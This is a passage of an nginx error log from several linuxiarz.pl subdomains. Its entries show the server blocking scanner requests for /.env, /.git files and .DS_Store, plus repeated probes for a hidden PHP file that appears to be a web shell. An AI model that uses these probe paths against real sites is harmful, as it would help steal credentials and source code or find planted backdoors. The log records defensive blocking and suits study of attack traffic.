*22798 access forbidden by rule, client: 34.237.2.231, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "nginx.linuxiarz.pl" +2022/02/27 19:23:21 [error] 30557#30557: *36314 access forbidden by rule, client: 128.199.127.143, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/27 19:23:22 [error] 30557#30557: *36315 access forbidden by rule, client: 128.199.127.143, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/27 19:23:23 [error] 30557#30557: *36316 access forbidden by rule, client: 128.199.127.143, server: nginx.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/27 19:23:23 [error] 30557#30557: *36317 access forbidden by rule, client: 128.199.127.143, server: nginx.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/02/28 02:17:56 [error] 30557#30557: *40492 access forbidden by rule, client: 89.248.174.178, server: pliki.linuxiarz.pl, request: "GET /.git/index HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/28 02:17:56 [error] 30557#30557: *40492 access forbidden by rule, client: 89.248.174.178, server: pliki.linuxiarz.pl, request: "GET /api/.git/index HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/28 02:17:59 [error] 30557#30557: *40493 access forbidden by rule, client: 89.248.174.178, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/28 02:17:59 [error] 30557#30557: *40493 access forbidden by rule, client: 89.248.174.178, server: pliki.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/02/28 17:09:45 [error] 30557#30557: *46328 access forbidden by rule, client: 128.199.127.143, server: rspamd.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2022/02/28 17:09:46 [error] 30557#30557: *46329 access forbidden by rule, client: 128.199.127.143, server: rspamd.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2022/02/28 17:09:47 [error] 30557#30557: *46330 access forbidden by rule, client: 128.199.127.143, server: rspamd.linuxiarz.pl, request: "GET /storage/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2022/02/28 17:09:48 [error] 30557#30557: *46331 access forbidden by rule, client: 128.199.127.143, server: rspamd.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "rspamd.linuxiarz.pl" +2022/02/28 17:56:21 [error] 30557#30557: *46749 access forbidden by rule, client: 52.188.48.42, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/03/05 20:41:49 [error] 30557#30557: *98027 access forbidden by rule, client: 52.188.48.42, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/08 00:48:37 [error] 30557#30557: *122357 access forbidden by rule, client: 52.188.48.42, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/03/19 02:08:54 [error] 30557#30557: *255717 access forbidden by rule, client: 3.65.27.28, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.12.2-linuxiarz.pl-%5Bopenssl-1.1.0f%5D/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:28 [error] 30557#30557: *285795 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/nginx-1.9.4-pagespeed-vts/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:28 [error] 30557#30557: *285796 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_7/nginx-1.10.0-OUT-OF-THE-BOX-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:28 [error] 30557#30557: *285797 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_15.10/nginx-1.8.1-OUT-OF-THE-BOX-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:39 [error] 30558#30558: *285799 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_16.04_LTS/nginx-linuxiarz.pl-HTTP2%2BSPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:39 [error] 30558#30558: *285800 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_14.04_LTS/nginx-1.10.0-STABLE-OUT-OF-THE-BOX/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:39 [error] 30558#30558: *285801 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.12.1-linuxiarz.pl-%5Bopenssl-1.1.0f%5D/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:29:39 [error] 30557#30557: *285798 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2014.04%20LTS/nginx-1.9.13-OUT-OF-THE-BOX-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:30:03 [error] 30557#30557: *285803 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-1.9.13-OUT-OF-THE-BOX-ARM/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:30:03 [error] 30557#30557: *285804 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian%207/nginx-1.8.0-pagespeed-vts-OUT-OF-THE-BOX-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:30:03 [error] 30557#30557: *285805 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian%208/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:21 [error] 30557#30557: *285811 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2014.04%20LTS/nginx-1.12.0-linuxiarz.pl-%5Bopenssl-1.1.0e%5D/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:21 [error] 30557#30557: *285812 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2014.04%20LTS/nginx-1.12.1-linuxiarz.pl-%5Bopenssl-1.1.0f%5D/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:31 [error] 30557#30557: *285821 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/Tengine-2.2.0/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:31 [error] 30557#30557: *285822 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_15.10/nginx-1.9.10-OUT-OF-THE-BOX-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:31 [error] 30557#30557: *285819 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_9/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/22 07:31:31 [error] 30557#30557: *285820 access forbidden by rule, client: 18.156.198.15, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/apache2_2-4-39-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/26 21:06:42 [error] 9650#9650: *10944 access forbidden by rule, client: 3.80.231.188, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/03/26 23:48:45 [error] 9650#9650: *11920 access forbidden by rule, client: 3.80.231.188, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/03/27 04:07:02 [error] 9650#9650: *12811 access forbidden by rule, client: 3.236.150.156, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/04/24 08:04:23 [error] 4467#4467: *127618 access forbidden by rule, client: 40.66.48.89, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/04/24 08:05:16 [error] 4467#4467: *127646 access forbidden by rule, client: 40.66.48.89, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/04/24 08:05:50 [error] 4467#4467: *127669 access forbidden by rule, client: 40.66.48.89, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/04/30 00:30:50 [error] 6041#6041: *32855 access forbidden by rule, client: 212.102.42.202, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/05/02 20:23:45 [error] 6041#6041: *57848 access forbidden by rule, client: 179.43.168.138, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2022/05/03 15:45:42 [error] 6041#6041: *68272 access forbidden by rule, client: 179.43.168.138, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "nginx.linuxiarz.pl" +2022/05/03 17:07:43 [error] 6041#6041: *68861 access forbidden by rule, client: 179.43.168.138, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2022/05/03 19:08:59 [error] 6041#6041: *69959 access forbidden by rule, client: 45.89.174.100, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/05 11:33:15 [error] 6041#6041: *90169 access forbidden by rule, client: 3.71.106.114, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_16.04_LTS/nginx-linuxiarz.pl-HTTP2+SPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/05 11:33:20 [error] 6041#6041: *90170 access forbidden by rule, client: 3.71.106.114, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_15.10/nginx-linuxiarz.pl-HTTP2+SPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/05 11:33:23 [error] 6041#6041: *90171 access forbidden by rule, client: 3.71.106.114, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_14.04_LTS/nginx-linuxiarz.pl-HTTP2+SPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/05 11:33:25 [error] 6041#6041: *90172 access forbidden by rule, client: 3.71.106.114, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2014.04%20LTS/nginx-linuxiarz.pl-HTTP2+SPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/05 11:33:26 [error] 6041#6041: *90173 access forbidden by rule, client: 3.71.106.114, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/nginx-linuxiarz.pl-HTTP2+SPDY/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/06 00:39:35 [error] 6041#6041: *93958 access forbidden by rule, client: 79.110.54.124, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/05/19 13:55:10 [error] 6041#6041: *223378 access forbidden by rule, client: 20.218.80.10, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/19 13:55:16 [error] 6041#6041: *223385 access forbidden by rule, client: 20.218.80.10, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/05/19 13:55:18 [error] 6041#6041: *223393 access forbidden by rule, client: 20.218.80.10, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/05/23 19:02:38 [error] 6041#6041: *265458 access forbidden by rule, client: 107.189.10.150, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/23 19:02:38 [error] 6041#6041: *265460 access forbidden by rule, client: 104.244.72.120, server: kompilacje.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/05/28 12:50:48 [error] 6041#6041: *313015 access forbidden by rule, client: 85.202.169.88, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/yyfohilw/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/05/28 12:51:17 [error] 6041#6041: *313018 access forbidden by rule, client: 85.202.169.88, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/rglradad/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/05/28 16:26:56 [error] 6041#6041: *314312 access forbidden by rule, client: 85.202.169.88, server: kodi.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/obfipmqt/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "www.google.com" +2022/05/28 16:27:10 [error] 6041#6041: *314320 access forbidden by rule, client: 85.202.169.88, server: kodi.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/scocdaeo/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "www.google.com" +2022/05/28 22:38:16 [error] 6041#6041: *318463 access forbidden by rule, client: 85.202.169.88, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/smdzujsg/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/05/28 22:38:38 [error] 6041#6041: *318470 access forbidden by rule, client: 85.202.169.88, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/iesrwspt/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/05/31 18:01:02 [error] 6041#6041: *344182 access forbidden by rule, client: 85.202.169.88, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/kpswazbl/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/05/31 18:01:25 [error] 6041#6041: *344189 access forbidden by rule, client: 85.202.169.88, server: nginx.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/hulqtiag/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "www.google.com" +2022/05/31 21:28:32 [error] 6041#6041: *345728 access forbidden by rule, client: 85.202.169.88, server: kodi.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/zlemgrof/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "www.google.com" +2022/05/31 21:28:48 [error] 6041#6041: *345735 access forbidden by rule, client: 85.202.169.88, server: kodi.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/xtpbxxck/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "www.google.com" +2022/06/01 03:28:01 [error] 6041#6041: *347662 access forbidden by rule, client: 85.202.169.88, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/qlzgcwcz/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/06/01 03:28:26 [error] 6041#6041: *347674 access forbidden by rule, client: 85.202.169.88, server: pliki.linuxiarz.pl, request: "GET /wp-content/uploads/typehub/custom/cbyvbtyc/.sp3ctra_XO.php?Fox=d3wL7 HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "www.google.com" +2022/06/01 09:01:59 [error] 6041#6041: *348863 access forbidden by rule, client: 20.116.14.100, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/06/01 09:02:04 [error] 6041#6041: *348885 access forbidden by rule, client: 20.116.14.100, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/06/09 11:03:45 [error] 6041#6041: *427656 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/09 11:03:45 [error] 6041#6041: *427659 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/09 11:03:45 [error] 6041#6041: *427662 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/09 17:54:47 [error] 6041#6041: *430817 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/09 17:54:47 [error] 6041#6041: *430820 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/09 17:54:47 [error] 6041#6041: *430823 access forbidden by rule, client: 138.68.185.88, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/11 01:40:32 [error] 6041#6041: *443459 access forbidden by rule, client: 138.68.185.88, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/06/11 01:40:32 [error] 6041#6041: *443462 access forbidden by rule, client: 138.68.185.88, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/06/11 01:40:32 [error] 6041#6041: *443465 access forbidden by rule, client: 138.68.185.88, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/06/11 02:56:40 [error] 6041#6041: *443884 access forbidden by rule, client: 138.68.185.88, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/06/11 02:56:40 [error] 6041#6041: *443887 access forbidden by rule, client: 138.68.185.88, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/06/11 02:56:41 [error] 6041#6041: *443890 access forbidden by rule, client: 138.68.185.88, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/06/13 15:14:58 [error] 30596#30596: *8824 access forbidden by rule, client: 20.197.180.8, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/26 23:41:24 [error] 1257#1257: *40070 access forbidden by rule, client: 77.68.15.145, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/06/30 10:04:00 [error] 1257#1257: *72251 access forbidden by rule, client: 193.123.109.218, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/06/30 10:09:57 [error] 1257#1257: *72293 access forbidden by rule, client: 193.123.109.218, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/06/30 10:15:49 [error] 1257#1257: *72323 access forbidden by rule, client: 193.123.109.218, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/01 01:00:38 [error] 1257#1257: *76670 access forbidden by rule, client: 20.197.180.8, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/04 02:11:13 [error] 1257#1257: *100624 access forbidden by rule, client: 20.248.201.244, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/04 03:35:33 [error] 1257#1257: *101139 access forbidden by rule, client: 193.123.109.218, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/04 03:47:39 [error] 1257#1257: *101232 access forbidden by rule, client: 193.123.109.218, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/04 04:41:27 [error] 1257#1257: *101561 access forbidden by rule, client: 193.123.109.218, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/07 06:02:31 [error] 18791#18791: *2576 access forbidden by rule, client: 20.196.201.65, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/08 11:06:57 [error] 12269#12269: *67 access forbidden by rule, client: 20.188.29.114, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/10 00:35:57 [error] 12269#12269: *36016 access forbidden by rule, client: 20.226.74.203, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/10 00:51:45 [error] 12269#12269: *36099 access forbidden by rule, client: 20.226.74.203, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/10 01:08:52 [error] 12269#12269: *36242 access forbidden by rule, client: 20.226.74.203, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/15 09:33:11 [error] 12269#12269: *130589 access forbidden by rule, client: 20.206.249.94, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/15 17:55:28 [error] 12269#12269: *137659 access forbidden by rule, client: 20.206.249.94, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/15 18:17:23 [error] 12269#12269: *137997 access forbidden by rule, client: 20.206.249.94, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/16 02:39:45 [error] 12269#12269: *143020 access forbidden by rule, client: 105.159.140.138, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/16 02:43:14 [error] 12269#12269: *143088 access forbidden by rule, client: 105.159.140.138, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/16 02:46:52 [error] 12269#12269: *143156 access forbidden by rule, client: 105.159.140.138, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/18 09:07:34 [error] 12269#12269: *184357 access forbidden by rule, client: 52.172.29.228, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/18 21:25:30 [error] 12269#12269: *192477 access forbidden by rule, client: 20.213.126.68, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/19 18:13:03 [error] 12269#12269: *205392 access forbidden by rule, client: 20.206.201.208, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2022/07/19 18:28:06 [error] 12269#12269: *205548 access forbidden by rule, client: 20.206.201.208, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2022/07/19 18:46:08 [error] 12269#12269: *205772 access forbidden by rule, client: 20.206.201.208, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/20 00:25:52 [error] 12269#12269: *210520 access forbidden by rule, client: 191.101.217.27, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2022/07/20 19:13:39 [error] 12269#12269: *223496 access forbidden by rule, client: 179.43.167.170, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "nginx.linuxiarz.pl" +2022/07/20 21:02:24 [error] 12269#12269: *225027 access forbidden by rule, client: 179.43.167.170, server: pliki.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "pliki.linuxiarz.pl" +2022/07/20 23:27:07 [error] 12269#12269: *226747 access forbidden by rule, client: 179.43.167.170, server: kompilacje.linuxiarz.pl, request: "GET /.git/HEAD HTTP/2.0", host: "kompilacje.linuxiarz.pl" +2022/07/22 22:49:21 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:21 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:23 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:23 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:25 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET /favicon.ico HTTP/2.0", upstream: "http://127.0.0.1:11334/favicon.ico", host: "rspamd.linuxiarz.pl", referrer: "https://rspamd.linuxiarz.pl/" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 85.221.224.109, server: rspamd.linuxiarz.pl, request: "GET / HTTP/2.0", upstream: "http://127.0.0.1:11334/", host: "rspamd.linuxiarz.pl" +2022/07/22 22:49:26 [error] 12269#12269: *259302 connect() failed (111: Connection refused) while connecting to upstream, client: 